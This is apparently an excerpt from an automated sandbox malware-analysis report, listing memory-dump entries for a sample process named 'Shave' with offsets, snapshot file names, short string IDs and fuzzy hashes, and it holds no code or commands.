                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: D@$D@$D@
                                                                                                                                • API String ID: 0-3330130650
                                                                                                                                • Opcode ID: 94141ed8813611e236a8ac25daee37cf83f697c47d818405a760b99d25b845d2
                                                                                                                                • Instruction ID: 760c62552d12f0455c9145f22e91b801d899617efb6b2ac740acf7fd5492f734
                                                                                                                                • Opcode Fuzzy Hash: 94141ed8813611e236a8ac25daee37cf83f697c47d818405a760b99d25b845d2
                                                                                                                                • Instruction Fuzzy Hash: 2BB1AF74E002298FDB64DF68C855BDEBBB2BB88300F1081E9D50DA7291DB74AE85DF51
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5$Te]q
                                                                                                                                • API String ID: 0-1459978942
                                                                                                                                • Opcode ID: c4f2de676643b5a217f2ddcd8d31c63bac6b68c00bbb39358adcc6f00452161c
                                                                                                                                • Instruction ID: 5c6e9384827e5ccfea873f75d674ccaacdf0b9ec22b72f6518fc13f1d762e1a8
                                                                                                                                • Opcode Fuzzy Hash: c4f2de676643b5a217f2ddcd8d31c63bac6b68c00bbb39358adcc6f00452161c
                                                                                                                                • Instruction Fuzzy Hash: DD82D074A01269CFDB64DF24C994BADB7B6BF89304F2041E9D80967361CB35AE86CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Te]q$Te]q
                                                                                                                                • API String ID: 0-3320153681
                                                                                                                                • Opcode ID: 1af1c1f313c5ab2037fb4b3849753fe48ffeee41250432323d3fbbd022111e03
                                                                                                                                • Instruction ID: 45fe2688a74b9c458041cd2aa7f51bc0cf7eec000ca9bc25ddb5bfee634f15ff
                                                                                                                                • Opcode Fuzzy Hash: 1af1c1f313c5ab2037fb4b3849753fe48ffeee41250432323d3fbbd022111e03
                                                                                                                                • Instruction Fuzzy Hash: 7B82E074A01268CFDB64DF24C994BADBBB2FB49301F2045E9D909A7360DB35AE85CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5$Te]q
                                                                                                                                • API String ID: 0-1459978942
                                                                                                                                • Opcode ID: d29717e6a308fde5f5cc94a279b2565faecd7a81cc3fc1123c1f4efc54a420ea
                                                                                                                                • Instruction ID: 35b16a5a059370d632d7a4e377ad146e08c626c996873cddf5185cc7c24add40
                                                                                                                                • Opcode Fuzzy Hash: d29717e6a308fde5f5cc94a279b2565faecd7a81cc3fc1123c1f4efc54a420ea
                                                                                                                                • Instruction Fuzzy Hash: 5782D074A01269CFCB64DF24C994BADB7B6BF89304F2041E9D80967361CB35AE86CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Te]q$Te]q
                                                                                                                                • API String ID: 0-3320153681
                                                                                                                                • Opcode ID: 3aeea767de4b936e15c7ffad296609e942562c95b676600fbab7b6898146e047
                                                                                                                                • Instruction ID: 9665839885a2c14e2e2d506f6a38011b036e8b1d7c1e0756eaa3463945e6adf3
                                                                                                                                • Opcode Fuzzy Hash: 3aeea767de4b936e15c7ffad296609e942562c95b676600fbab7b6898146e047
                                                                                                                                • Instruction Fuzzy Hash: 5782E074A01268CFDB64DF24C994BADBBB2FB49301F2045E9D909A7360DB35AE85CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q
                                                                                                                                • API String ID: 0-127220927
                                                                                                                                • Opcode ID: 74dc48c6ab4a1f6b491defb5168be9bbcf4a5eb407964156ffa351dfe56530ec
                                                                                                                                • Instruction ID: 7105e627a60e11b7d43a24923e1fb71238fca9a72d3fa0e6e749edc52ef8abf4
                                                                                                                                • Opcode Fuzzy Hash: 74dc48c6ab4a1f6b491defb5168be9bbcf4a5eb407964156ffa351dfe56530ec
                                                                                                                                • Instruction Fuzzy Hash: B6520074A00218CFEB159BA4C960B9EBBB7EF84300F1080ADD55A6B3A6CF355E45DF91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Te]q$Te]q
                                                                                                                                • API String ID: 0-3320153681
                                                                                                                                • Opcode ID: 54f2521fb969af1745ce684c9522646e883d7de086e6f3fa461b1b3abf318d3e
                                                                                                                                • Instruction ID: 6ef6d3e45b15bac87c92185f1fbff0ec46cfc5588a2649eeabda4de402317ede
                                                                                                                                • Opcode Fuzzy Hash: 54f2521fb969af1745ce684c9522646e883d7de086e6f3fa461b1b3abf318d3e
                                                                                                                                • Instruction Fuzzy Hash: 2C52DF74A01268CFDB64DF24C994BADBBB2FB49300F2045E9D909A7361DB35AE85CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3301681538.00000000379F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 379F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_379f0000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4U%5$Te]q
                                                                                                                                • API String ID: 0-1459978942
                                                                                                                                • Opcode ID: b9cd742b7ae516684875dd3025b376099aa7f61c15770068732f5daeaca74f7e
                                                                                                                                • Instruction ID: 1964728052133ed941491fec5b18f25d1fbb7403f6416fbd832eb3d5d7f3b4bf
                                                                                                                                • Opcode Fuzzy Hash: b9cd742b7ae516684875dd3025b376099aa7f61c15770068732f5daeaca74f7e
                                                                                                                                • Instruction Fuzzy Hash: F052DF74A00229CFDB64DF24C994BADB7B6BF49304F2041E9D909A7361DB35AE86CF44
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Haq$Haq
                                                                                                                                • API String ID: 0-4016896955
                                                                                                                                • Opcode ID: dd2be83bf3cdd277b1333f1d760b4dd3243b8b71f370c98d7a197c6a7e3b4341
                                                                                                                                • Instruction ID: eb0055eeed43cfec6250c371ba0844dcd9562297f71fab7b4953f132af7b58d4
                                                                                                                                • Opcode Fuzzy Hash: dd2be83bf3cdd277b1333f1d760b4dd3243b8b71f370c98d7a197c6a7e3b4341
                                                                                                                                • Instruction Fuzzy Hash: D7B1AE30708251CFCB159F258894A7A7BB6AFC9302F55456AE816CB3A2DB34CC8AD791
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LR]q$LR]q
                                                                                                                                • API String ID: 0-3917262905
                                                                                                                                • Opcode ID: 68643f3e1138bee9242e1532bb6dee585d41afb3ed0a29e139019ac9283a04ae
                                                                                                                                • Instruction ID: 7f8f0c5be7c764e9c83914b43ed792965a18c2f8327a4abc2d69cbaa289db749
                                                                                                                                • Opcode Fuzzy Hash: 68643f3e1138bee9242e1532bb6dee585d41afb3ed0a29e139019ac9283a04ae
                                                                                                                                • Instruction Fuzzy Hash: 15816C34B101058FDB04DF78C894A6EB7B6FF89644B1581A9E906DB3B1EB34ED02CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,aq$,aq
                                                                                                                                • API String ID: 0-2990736959
                                                                                                                                • Opcode ID: 9e9588b90ffcbf8bf22e701db92ba289497d3d81accad664ab4101c81d16d1b9
                                                                                                                                • Instruction ID: b9bda2ee919a0878cdbbec1f76393b297414f080ef3aa0f593be50ec33f735e2
                                                                                                                                • Opcode Fuzzy Hash: 9e9588b90ffcbf8bf22e701db92ba289497d3d81accad664ab4101c81d16d1b9
                                                                                                                                • Instruction Fuzzy Hash: FB819134A00505CFCB58CF69C484969BBB2BF89312BA58169D825DB365DB31EC49CBE1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (&]q$(aq
                                                                                                                                • API String ID: 0-1602648543
                                                                                                                                • Opcode ID: 1faebcb366cce35fd7c66d59bfc22e5dbe6fd94f49ff4620cdd8a479a0db1f3a
                                                                                                                                • Instruction ID: 1d68d1af9196a0b8286fb2d98e80ecd7e8ed990d9a05ef23c927b359625192d8
                                                                                                                                • Opcode Fuzzy Hash: 1faebcb366cce35fd7c66d59bfc22e5dbe6fd94f49ff4620cdd8a479a0db1f3a
                                                                                                                                • Instruction Fuzzy Hash: 35719431F002199BDB15EFA9C8506EEBFB2AFC8700F148569E405A7381DF34AE46CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: D@$D@
                                                                                                                                • API String ID: 0-548349879
                                                                                                                                • Opcode ID: b65aa5974d1d03314b551d9e6086f9596f38039756becb221a96b375837a59a1
                                                                                                                                • Instruction ID: dbfeb5932189549533614ca2e07efa2236bfee0f6271365371c251ba54d2ea7f
                                                                                                                                • Opcode Fuzzy Hash: b65aa5974d1d03314b551d9e6086f9596f38039756becb221a96b375837a59a1
                                                                                                                                • Instruction Fuzzy Hash: AD51B574D002199FDB04DFA9C555AEEBBF2FF88300F208569D505AB395DB346A46CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8bq$TJbq
                                                                                                                                • API String ID: 0-3440557903
                                                                                                                                • Opcode ID: 20031cf8a66bb82f58b83e2e12656be36ac119a6955bc96a4fc2217046a23d6e
                                                                                                                                • Instruction ID: dbf04bbcb5f59c5f43847e336fbb9f52472bb61bdf4089f6fbb834f6209d18dc
                                                                                                                                • Opcode Fuzzy Hash: 20031cf8a66bb82f58b83e2e12656be36ac119a6955bc96a4fc2217046a23d6e
                                                                                                                                • Instruction Fuzzy Hash: 3F312434B402098FCB48EFA8C581E9EBBB6FF88320F195550E505AB366CB30ED45CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8bq$TJbq
                                                                                                                                • API String ID: 0-3440557903
                                                                                                                                • Opcode ID: 37e4dea0576e0d90892409769853b245a48b8a06ad55c23c57f8a79b23cc1c8d
                                                                                                                                • Instruction ID: 5bcb63ab6f1b4aec5c2897e4682e09e76a29f84415be79a98713b7271123a7cf
                                                                                                                                • Opcode Fuzzy Hash: 37e4dea0576e0d90892409769853b245a48b8a06ad55c23c57f8a79b23cc1c8d
                                                                                                                                • Instruction Fuzzy Hash: 0F313534B402098FCB44EFA8C591E9EBBB6EF88320F155554E505AF376CA70ED45CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                • Opcode ID: 3c93c58f42ca495b962d36dd347669ef8c1df11972e5685e71ba2a10bcb78d70
                                                                                                                                • Instruction ID: 58c39bfbb38937fe168a1097e53c0b5fcf7d67b656e2592e13a51525031c3923
                                                                                                                                • Opcode Fuzzy Hash: 3c93c58f42ca495b962d36dd347669ef8c1df11972e5685e71ba2a10bcb78d70
                                                                                                                                • Instruction Fuzzy Hash: B0F0A435300104AFDB081BAA985497ABBDBEFC8361B044429BD1AC7350DF65CC0583A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LR]q
                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                • Opcode ID: 6052eb7106193c05ecc2bb957d881ba92fc5c8cdf8445b18c7cb372bf1b8fe7b
                                                                                                                                • Instruction ID: a2da8ff844d4798f65e33cac24b4bd7fe20cf2506fdf3678708e68edb7cd44d8
                                                                                                                                • Opcode Fuzzy Hash: 6052eb7106193c05ecc2bb957d881ba92fc5c8cdf8445b18c7cb372bf1b8fe7b
                                                                                                                                • Instruction Fuzzy Hash: 26520874A00659CFCB54EF64DD84A8DBBB2FF48341F2081A9D50AA7365DB346E86CF84
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Haq
                                                                                                                                • API String ID: 0-725504367
                                                                                                                                • Opcode ID: 1486b8e08f1d12ff79200890cca9393f003d50e2ae96534f92ad05e7fbd2f855
                                                                                                                                • Instruction ID: d67db8768e971c8cd79b90eaae838977b182aa78758d5ccc5a056b4f1f8afad2
                                                                                                                                • Opcode Fuzzy Hash: 1486b8e08f1d12ff79200890cca9393f003d50e2ae96534f92ad05e7fbd2f855
                                                                                                                                • Instruction Fuzzy Hash: 4F31E631A042449FCB08EFB898555AE7BB6EF89301F1081B9E519DB752DE308E02C791
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o]q
                                                                                                                                • API String ID: 0-794736227
                                                                                                                                • Opcode ID: 54d4e93ca5002f40d7d4b02f198eff47228fee556c359a996ad8b3bb8e981760
                                                                                                                                • Instruction ID: 5087158e33b21d9f43901e452f213bef3925f89b65905f90681b09c58da34768
                                                                                                                                • Opcode Fuzzy Hash: 54d4e93ca5002f40d7d4b02f198eff47228fee556c359a996ad8b3bb8e981760
                                                                                                                                • Instruction Fuzzy Hash: 3B2168317082948FCB065B385C240AE7FB26FD631275441ABE966CB6E3CF244C0AC792
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Haq
                                                                                                                                • API String ID: 0-725504367
                                                                                                                                • Opcode ID: 8520270e03d8ee43ff4ab16ece63ff713f7d25a31134e9260d6a0704f9dc968b
                                                                                                                                • Instruction ID: e301c74aa476c9f09bd3a0b51c10ab3cb3b480d3fab99f67abc2c6f3333fff2f
                                                                                                                                • Opcode Fuzzy Hash: 8520270e03d8ee43ff4ab16ece63ff713f7d25a31134e9260d6a0704f9dc968b
                                                                                                                                • Instruction Fuzzy Hash: 1D21E630A042499FD708AF69C851A9E7FBBFF85701F1084AAD9499B3A6CF318E46C751
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: F
                                                                                                                                • API String ID: 0-2730988801
                                                                                                                                • Opcode ID: 0ff8fdd6381751c383aa278411fca5388058102de9e9dccc8f7cbc5b7a1fc686
                                                                                                                                • Instruction ID: 96d16be04f4518e711de25e4be2e8c6f74bf7d05dde9649f1e89c60023e87cb1
                                                                                                                                • Opcode Fuzzy Hash: 0ff8fdd6381751c383aa278411fca5388058102de9e9dccc8f7cbc5b7a1fc686
                                                                                                                                • Instruction Fuzzy Hash: E1315A74D092498FCB05DFB8D8046EDBFB5EF4A300F0042AAD444AB261EB345A89CBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5434683e361fd5ed90db3bf458c5b31d5e0489904e53bd34c186484dd095d08a
                                                                                                                                • Instruction ID: f7d5a5a4cac5f5e7557a0bb8fa0fcbace01d5c6731125a6fe65f027bc61cf393
                                                                                                                                • Opcode Fuzzy Hash: 5434683e361fd5ed90db3bf458c5b31d5e0489904e53bd34c186484dd095d08a
                                                                                                                                • Instruction Fuzzy Hash: DA129835065646CFA2502B70EDAC12BBBF1FB1F32B7546CA8F10FC58659B7144C9CA62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3302124702.0000000038310000.00000040.00000800.00020000.00000000.sdmp, Offset: 38310000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_38310000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3cd912612dac58c28199484f68225ceaaefbcab88e8d4c16113aebec4a80f352
                                                                                                                                • Instruction ID: 5593a7dad4af769f42edd778a484accf377050acca3c02a675b9e100101570dd
                                                                                                                                • Opcode Fuzzy Hash: 3cd912612dac58c28199484f68225ceaaefbcab88e8d4c16113aebec4a80f352
                                                                                                                                • Instruction Fuzzy Hash: 4C51F1B6B012059FD718AF78D841AAABBBAEFC5B21F10C52AE459DB740D7309901C7A0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3276080775.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_150000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0c1e5541854d36cbe3558873340bc81b7f556cdfa66fd55b53b5efcf91223dbf
                                                                                                                                • Instruction ID: 211a615d37b741a51e6d7cf21f82384e58bece54667931bed5a90b7ad11fab8f
                                                                                                                                • Opcode Fuzzy Hash: 0c1e5541854d36cbe3558873340bc81b7f556cdfa66fd55b53b5efcf91223dbf
                                                                                                                                • Instruction Fuzzy Hash: C471F534700A05CFCB15DF68C884A6A7BE6AF99342F1540A9E826EF371DB70DC86CB51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4c73271eb158b35344a7e709ff8e5b5e00f61ba953ef1d6a94bdf9d7b8f20614
                                                                                                                                • Instruction ID: 463579fb82084b57d71c7a538f24e555024afd91745d280c2b2dfa54c69397be
                                                                                                                                • Opcode Fuzzy Hash: 4c73271eb158b35344a7e709ff8e5b5e00f61ba953ef1d6a94bdf9d7b8f20614
                                                                                                                                • Instruction Fuzzy Hash: 9161E674E012099FDB08DFE9D954ADDBBF2AF88301F50C569E418AB396DA30A942CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3b75fc9f61991f80355f72d27992ef2d3a8cc424ffff978f83cf6cd5c9d9981e
                                                                                                                                • Instruction ID: a419231ab562c12ae9d6dd762654e7513094aacffbb2a718169e6af3154c3358
                                                                                                                                • Opcode Fuzzy Hash: 3b75fc9f61991f80355f72d27992ef2d3a8cc424ffff978f83cf6cd5c9d9981e
                                                                                                                                • Instruction Fuzzy Hash: C081A074E412698FDB65DF29DD90BDDBBB2BB89300F1081EAD959A7260DB305E81CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279490786.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b00000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2507dfe0034e72cd29f6a32d00f6b5123b6a1df5a1d476c70f729a1aba6ff8a7
                                                                                                                                • Instruction ID: 930596c33b43336f5a84694fff5742fc0bdf9ada39d462cc17b451f7556c48c0
                                                                                                                                • Opcode Fuzzy Hash: 2507dfe0034e72cd29f6a32d00f6b5123b6a1df5a1d476c70f729a1aba6ff8a7
                                                                                                                                • Instruction Fuzzy Hash: BE61E4B4E012089FDB08DFE9D954ADDBBF2AF88301F10C565E818AB395DA30A942CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f53f43212d7fd4ec18e47773e0678e795d6a757c12a4cb7f9a1f3ecb7b88fb2c
                                                                                                                                • Instruction ID: 7875fabb29f5328fd80e905d3874d6a8b5e798ccdfe9a28e50bb03bc900f4e13
                                                                                                                                • Opcode Fuzzy Hash: f53f43212d7fd4ec18e47773e0678e795d6a757c12a4cb7f9a1f3ecb7b88fb2c
                                                                                                                                • Instruction Fuzzy Hash: E671C174E00208CFDB18DFA9C990ADDBBB6BF89300F248129D815BB365DB35A946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279584649.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4b50000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c9fbc2819c5f00dadcaab82d928a88c8bf3f5bcde27f054eeef2c51c5dcf008e
                                                                                                                                • Instruction ID: 3e8167cc131a51ee3f1c03909037c0308eebbc8071aa2d0dc87cd2321801fc7b
                                                                                                                                • Opcode Fuzzy Hash: c9fbc2819c5f00dadcaab82d928a88c8bf3f5bcde27f054eeef2c51c5dcf008e
                                                                                                                                • Instruction Fuzzy Hash: D871B274E00208CFDB19DFA9C994ADDBBB2BF89300F248129D815BB365DB359946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2b6c0aea71e834c5e09bc1e69b7e18fe2720cf5eee3076549c5ce9e0dcd02025
                                                                                                                                • Instruction ID: 034a3ece5ee99c13a64c62c590299c1ed359ea146a735275352e0adb23cb2473
                                                                                                                                • Opcode Fuzzy Hash: 2b6c0aea71e834c5e09bc1e69b7e18fe2720cf5eee3076549c5ce9e0dcd02025
                                                                                                                                • Instruction Fuzzy Hash: F871C278E00208CFDB08EFA5D990ADDBBB2BF89300F249129D815BB355DB35A946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.3279803869.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e40000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b67f91b0bbe8a6f9b280a8afe32d4826fbae55dc90adc957219fec3528c1f1ca
                                                                                                                                • Instruction ID: ef4be7cf1f5fa30bc892c383a2ebff7880c61ee92eac6e1298836ff650477403
                                                                                                                                • Opcode Fuzzy Hash: b67f91b0bbe8a6f9b280a8afe32d4826fbae55dc90adc957219fec3528c1f1ca
                                                                                                                                • Instruction Fuzzy Hash: 5271D074E00208CFDB08DFA9D990AEDBBB2BF89300F248129D915BB355DB35A946CF54
